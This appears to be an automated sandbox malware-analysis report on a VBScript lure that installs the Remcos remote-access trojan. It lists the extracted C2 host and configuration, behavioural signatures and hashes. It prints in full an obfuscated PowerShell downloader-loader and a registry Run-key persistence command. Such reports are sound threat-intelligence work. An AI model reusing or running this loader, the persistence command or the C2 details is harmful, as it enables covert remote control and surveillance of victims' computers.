Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
14-10-2024 14:31
General
-
Target
Beschwerde-Rechtsanwalt.vbs
-
Size
11KB
-
MD5
ccc92c18edd54b9cc3b2b4eda17fa805
-
SHA1
f9e44c7c49f8a20824e986126c3e1f8f3e35b3a8
-
SHA256
a0ab0a82d3d002785a5d1aafed149c455ae6a850c526cd78af24e42a3f453822
-
SHA512
9a26fcdc46e8259707beb94b529bb7f88d074507a5776fe513b39dce205ca5bde305824063eebee18558d58af4111f471ed808b239d5a60da54041bd9fd21fcf
-
SSDEEP
192:G3ICKmusCg05C6FLf7ifqMtgQoVcoNorNAJUgZ4nx:7EQ7ifqMzo0OWx
Score
10/10
Malware Config
Extracted
Family
remcos
Botnet
PeeWe8646
C2
www.autoshausamsachsenwald.de:6698
Attributes
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Weepee83472-FSSJ2L
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 36 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Beschwerde-Rechtsanwalt.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sygehuse Rappenskralder Sandwichs Gliridae tonsillitis Bolsjevikkens Spejlmonogrammers #>;$Gasradiatorernes='Lighedens';<#Legitimationers Ink Pedalian Bonzery nonnative Forjoges Allods #>;$Athwarthawse=$host.PrivateData;If ($Athwarthawse) {$Likableness++;}function henaandende($Doohinkus){$Tabira=$Lommeregnere+$Doohinkus.Length-$Likableness;for( $relativpronominernes=2;$relativpronominernes -lt $Tabira;$relativpronominernes+=3){$Toolsheds='Absenteres';$Bide+=$Doohinkus[$relativpronominernes];}$Bide;}function Webbank($Disintegrator91){ & ($Kilovar) ($Disintegrator91);}$Wrinklet=henaandende 'diM otrzIni lFalPaaGi/Ju5D .P,0 F Ku( aW Ni,enW d roSuwTrsRn P,N,pT e i1 g0Ko.Tr0Pe;Si ,pWUniH nVa6L,4Ru;Tr S.xGa6Br4,t;Re MorAnv.a:Zo1Or2Pr1Va.Py0 B).t BiGSueU c .kR o,a/Fo2 k0 l1 S0Pa0Ve1Es0 a1 m SuFOniS,rlgeRnfReoPhxDo/R 1Sy2Lu1Fa.D,0ma ';$Underhandle=henaandende ' ,uUnSM EStRN -.laFlGVee LN oT , ';$undercrossing=henaandende 'OshAft StKlp,esF :S /re/Liw DwSuwFy. MaC,uThtfooH h daSpu RsOz-O c Fn F. RdJeeLe/B oanlSed o/ RmR oU,bsaiGelTieBl/PrB eaKanS a.auI s TiUnc I.TiqBaxCodBg ';$Blindtablets122=henaandende 'Ur>U ';$Kilovar=henaandende 'GlI BeJeXP ';$Amtsborgmester='asyl';$Kimm='\prefectorial.Twa';Webbank (henaandende 'Co$Ceg el.uoAkbMua l :HeTAniMad TsXsiI nF dEdsWatFri elP.lTee urNe=A $une anKiv P:ScaJup LpcadPraEntUraAn+H $RaKOciRam mmU. ');Webbank (henaandende ' a$U g rl Wo,abZoaLylS :BeTCoeP,kTesRatBikHerPri FtVdi,nk i=Ob$Meu nDedLaeSlrGlc ,r ,op,sAusUni TnExgIm. WsStp Pl TiCotl (Vo$MaBTilDiiHyn,rdLat.ma .b fl leFit.asDi1Ba2Be2 I).n ');Webbank (henaandende '.a[MiNLoeF.t G.KaSineTerLavKei ,cS eOvPS,o .iNon tn M iaAnn uaDogSte Arty]va: G:P SO eTocPruanrHui Jt .yFoP Dr o PtKio IcUnoFolTo .= P Dy[ sNEreCotUn.KoS Ee ycsputrr TiKntDoyF PTerL oRotAuoSkcH oImlKoTDey epPreSa] S: .:SaTMalR s v1 a2 . ');$undercrossing=$Tekstkritik[0];$relativpronominernesnterlaces=(henaandende ' ,$MiGPaL uo,fBI A .l A:krTFrRNekIsKUnr eOnogSkEMyn Ce a=VinPueSiwAf- OO RB ojR eUlC,atLo toS .YemS RT E M ,. GnSte At .. qw oEPab ncixL BIFeEInnBhT r ');Webbank ($relativpronominernesnterlaces);Webbank (henaandende 'R,$UnTBrr vkOrkK.rNeoCogVie ,n AeSk. lHCae Da rdH eSar sFl[Tr$noUDrnM d eW r hhTraDon adSolHieH ] e=la$KaWF,r yi dn,hkFalV.eSatT. ');$Affaldspriserne=henaandende ' $SaTShr .kudkSpr oVeg,eeSen oe n.M DBro Sws,nPal toCoa.nd.rFHeiCal ae S(Da$JuuU nTad,oe lr CcGer Do s ssOpiKonDegpi,Af$.fP,ueFonW n .aIdt.ii Us Ue Bc ,t eLsdMi)G ';$Pennatisected=$Tidsindstiller;Webbank (henaandende ' ,$V,gChLO.O SbM,a l m:DitDoRAtaSlA dB,rVoEKoN.eSDiEViR Es o=An( GT AeMeSK.TOr- p AVaTThH o De$FoPHae jnO NSpa,iTS iDaSPeEM.c PtTieTaDSe)Re ');while (!$Traadrensers) {Webbank (henaandende 'Ka$ungMilSoo bP,a.klUn:PeSMejSplOvls.n MdFae nrR,eBesC.=,a$ ht KrEjuU.eOp ') ;Webbank $Affaldspriserne;Webbank (henaandende ' ,S .t.ka Or OtL.-GeSKal.eeApeCopRe Ko4 A ');Webbank (henaandende ' $FlgU lDroTrbI ac l :WiTTrr TaS aMudgirAveStnSpsSleByrMisWi= e( KT,ee os.pt n-BaP haC tVuhUs Fr$ P ge rnScn,oa Ct aiBesIveBec Pt SeStdPa)Bi ') ;Webbank (henaandende 'B $ ugPrlFioS b PaGrlAn:LeDSkeTen.us uiE tKro Fm ee FtSlrG.iMisGakK e =Un$Peg,al noInb OaPalr :FiD UeAkpS.t Ch,eiPrnRegUd+Su+ n%Ma$ iTveePikO sBat GkSyrF i.rt diAnk l. ScJuo AudinDut.e ') ;$undercrossing=$Tekstkritik[$Densitometriske];}$Forsire=308882;$Barrikaderes=29015;Webbank (henaandende ' $Brg ,lMioAkbElaDelRe: BSIntFinRhgSpeU.tN s.i E.=Bf XaGInetrtPh-KaC aoShnIntT e anBat,g Sp$ RPKeeAknManStaSkt.eistsUde ,cSltTre Nd.n ');Webbank (henaandende 'Ch$N g FlKaoSkbFla,alUf:StB.ir .u vtL.tDooGrtC,rSikD.kngoPhrSnt feL.nSae e r=Co Fo[KaSC.y msSotKjeJem.o. aCSuoR.nBrvSmeBerJut E]He: E:SaFInrS o om oBF.aFosW eW.6F 4InS tUnrJei lnAkgVo( M$ScSGetHonW gFaeL.t ,sEr)Ji ');Webbank (henaandende ' .$T gSplOvoB b OaBalk : oS RmluiFitMih AiKanKngBe .i=Un To[SpSHuyA sTot teU,m T.S TKoe axSytHy.daE lnTucC.oNud,ai Fn sgMa]Co:Fo:StA rSTrC DITaIni.TeGCoeOrtAnS etirrM i InS g W(Pr$.pBOpr vuMutSitInoydt rOukKykg,oc,r Ctpae.enFieKu)Af ');Webbank (henaandende 'Pe$ChgGrlTioTabU aB lP :FaFCalKnlDeeVesAft TiMulFol iTodAlsExmbanCodF =Jr$P,SCemHeiAntBeh IiSan ,gTw.Sts muB.bKesR,tSur,iiVin ,g S(R $,pF oH.r is i rOieF,, .$ UB EaIor SrBli kB aUndRae FrM e Rs )F, ');Webbank $Fllestillidsmnd;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Sygehuse Rappenskralder Sandwichs Gliridae tonsillitis Bolsjevikkens Spejlmonogrammers #>;$Gasradiatorernes='Lighedens';<#Legitimationers Ink Pedalian Bonzery nonnative Forjoges Allods #>;$Athwarthawse=$host.PrivateData;If ($Athwarthawse) {$Likableness++;}function henaandende($Doohinkus){$Tabira=$Lommeregnere+$Doohinkus.Length-$Likableness;for( $relativpronominernes=2;$relativpronominernes -lt $Tabira;$relativpronominernes+=3){$Toolsheds='Absenteres';$Bide+=$Doohinkus[$relativpronominernes];}$Bide;}function Webbank($Disintegrator91){ & ($Kilovar) ($Disintegrator91);}$Wrinklet=henaandende 'diM otrzIni lFalPaaGi/Ju5D .P,0 F Ku( aW Ni,enW d roSuwTrsRn P,N,pT e i1 g0Ko.Tr0Pe;Si ,pWUniH nVa6L,4Ru;Tr S.xGa6Br4,t;Re MorAnv.a:Zo1Or2Pr1Va.Py0 B).t BiGSueU c .kR o,a/Fo2 k0 l1 S0Pa0Ve1Es0 a1 m SuFOniS,rlgeRnfReoPhxDo/R 1Sy2Lu1Fa.D,0ma ';$Underhandle=henaandende ' ,uUnSM EStRN -.laFlGVee LN oT , ';$undercrossing=henaandende 'OshAft StKlp,esF :S /re/Liw DwSuwFy. MaC,uThtfooH h daSpu RsOz-O c Fn F. RdJeeLe/B oanlSed o/ RmR oU,bsaiGelTieBl/PrB eaKanS a.auI s TiUnc I.TiqBaxCodBg ';$Blindtablets122=henaandende 'Ur>U ';$Kilovar=henaandende 'GlI BeJeXP ';$Amtsborgmester='asyl';$Kimm='\prefectorial.Twa';Webbank (henaandende 'Co$Ceg el.uoAkbMua l :HeTAniMad TsXsiI nF dEdsWatFri elP.lTee urNe=A $une anKiv P:ScaJup LpcadPraEntUraAn+H $RaKOciRam mmU. ');Webbank (henaandende ' a$U g rl Wo,abZoaLylS :BeTCoeP,kTesRatBikHerPri FtVdi,nk i=Ob$Meu nDedLaeSlrGlc ,r ,op,sAusUni TnExgIm. WsStp Pl TiCotl (Vo$MaBTilDiiHyn,rdLat.ma .b fl leFit.asDi1Ba2Be2 I).n ');Webbank (henaandende '.a[MiNLoeF.t G.KaSineTerLavKei ,cS eOvPS,o .iNon tn M iaAnn uaDogSte Arty]va: G:P SO eTocPruanrHui Jt .yFoP Dr o PtKio IcUnoFolTo .= P Dy[ sNEreCotUn.KoS Ee ycsputrr TiKntDoyF PTerL oRotAuoSkcH oImlKoTDey epPreSa] S: .:SaTMalR s v1 a2 . ');$undercrossing=$Tekstkritik[0];$relativpronominernesnterlaces=(henaandende ' ,$MiGPaL uo,fBI A .l A:krTFrRNekIsKUnr eOnogSkEMyn Ce a=VinPueSiwAf- OO RB ojR eUlC,atLo toS .YemS RT E M ,. GnSte At .. qw oEPab ncixL BIFeEInnBhT r ');Webbank ($relativpronominernesnterlaces);Webbank (henaandende 'R,$UnTBrr vkOrkK.rNeoCogVie ,n AeSk. lHCae Da rdH eSar sFl[Tr$noUDrnM d eW r hhTraDon adSolHieH ] e=la$KaWF,r yi dn,hkFalV.eSatT. ');$Affaldspriserne=henaandende ' $SaTShr .kudkSpr oVeg,eeSen oe n.M DBro Sws,nPal toCoa.nd.rFHeiCal ae S(Da$JuuU nTad,oe lr CcGer Do s ssOpiKonDegpi,Af$.fP,ueFonW n .aIdt.ii Us Ue Bc ,t eLsdMi)G ';$Pennatisected=$Tidsindstiller;Webbank (henaandende ' ,$V,gChLO.O SbM,a l m:DitDoRAtaSlA dB,rVoEKoN.eSDiEViR Es o=An( GT AeMeSK.TOr- p AVaTThH o De$FoPHae jnO NSpa,iTS iDaSPeEM.c PtTieTaDSe)Re ');while (!$Traadrensers) {Webbank (henaandende 'Ka$ungMilSoo bP,a.klUn:PeSMejSplOvls.n MdFae nrR,eBesC.=,a$ ht KrEjuU.eOp ') ;Webbank $Affaldspriserne;Webbank (henaandende ' ,S .t.ka Or OtL.-GeSKal.eeApeCopRe Ko4 A ');Webbank (henaandende ' $FlgU lDroTrbI ac l :WiTTrr TaS aMudgirAveStnSpsSleByrMisWi= e( KT,ee os.pt n-BaP haC tVuhUs Fr$ P ge rnScn,oa Ct aiBesIveBec Pt SeStdPa)Bi ') ;Webbank (henaandende 'B $ ugPrlFioS b PaGrlAn:LeDSkeTen.us uiE tKro Fm ee FtSlrG.iMisGakK e =Un$Peg,al noInb OaPalr :FiD UeAkpS.t Ch,eiPrnRegUd+Su+ n%Ma$ iTveePikO sBat GkSyrF i.rt diAnk l. ScJuo AudinDut.e ') ;$undercrossing=$Tekstkritik[$Densitometriske];}$Forsire=308882;$Barrikaderes=29015;Webbank (henaandende ' $Brg ,lMioAkbElaDelRe: BSIntFinRhgSpeU.tN s.i E.=Bf XaGInetrtPh-KaC aoShnIntT e anBat,g Sp$ RPKeeAknManStaSkt.eistsUde ,cSltTre Nd.n ');Webbank (henaandende 'Ch$N g FlKaoSkbFla,alUf:StB.ir .u vtL.tDooGrtC,rSikD.kngoPhrSnt feL.nSae e r=Co Fo[KaSC.y msSotKjeJem.o. aCSuoR.nBrvSmeBerJut E]He: E:SaFInrS o om oBF.aFosW eW.6F 4InS tUnrJei lnAkgVo( M$ScSGetHonW gFaeL.t ,sEr)Ji ');Webbank (henaandende ' .$T gSplOvoB b OaBalk : oS RmluiFitMih AiKanKngBe .i=Un To[SpSHuyA sTot teU,m T.S TKoe axSytHy.daE lnTucC.oNud,ai Fn sgMa]Co:Fo:StA rSTrC DITaIni.TeGCoeOrtAnS etirrM i InS g W(Pr$.pBOpr vuMutSitInoydt rOukKykg,oc,r Ctpae.enFieKu)Af ');Webbank (henaandende 'Pe$ChgGrlTioTabU aB lP :FaFCalKnlDeeVesAft TiMulFol iTodAlsExmbanCodF =Jr$P,SCemHeiAntBeh IiSan ,gTw.Sts muB.bKesR,tSur,iiVin ,g S(R $,pF oH.r is i rOieF,, .$ UB EaIor SrBli kB aUndRae FrM e Rs )F, ');Webbank $Fllestillidsmnd;"1⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Zanjero" /t REG_EXPAND_SZ /d "%Kuls110% -windowstyle 1 $Baghuse=(gp -Path 'HKCU:\Software\Datafirmas\').blokhvl;%Kuls110% ($Baghuse)"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Zanjero" /t REG_EXPAND_SZ /d "%Kuls110% -windowstyle 1 $Baghuse=(gp -Path 'HKCU:\Software\Datafirmas\').blokhvl;%Kuls110% ($Baghuse)"3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD571444def27770d9071039d005d0323b7
SHA1cef8654e95495786ac9347494f4417819373427e
SHA2568438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
439KB
MD5877ad64824efe0b9c09cf1b5ec61df62
SHA195fcbcc088e47bce6afae1458f5eec768eb87740
SHA2566622db47173128823c886ab3db72b7bf99df9e4f5cf2c6d85e17da4177892622
SHA512206af51df2505e4d4e126c8c6f62a457f0d7c083da45c16ef73fc4088b311d70f5f8abbe29259f5d36e0328f5574c149aa882366f0dcc54d5e56d3b4a08e61f0
-
Filesize
104KB
-
Filesize
600KB
-
Filesize
18.3MB
-
Filesize
47.5MB
-
Filesize
5.6MB
-
Filesize
216KB
-
Filesize
6.2MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
136KB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
6.5MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB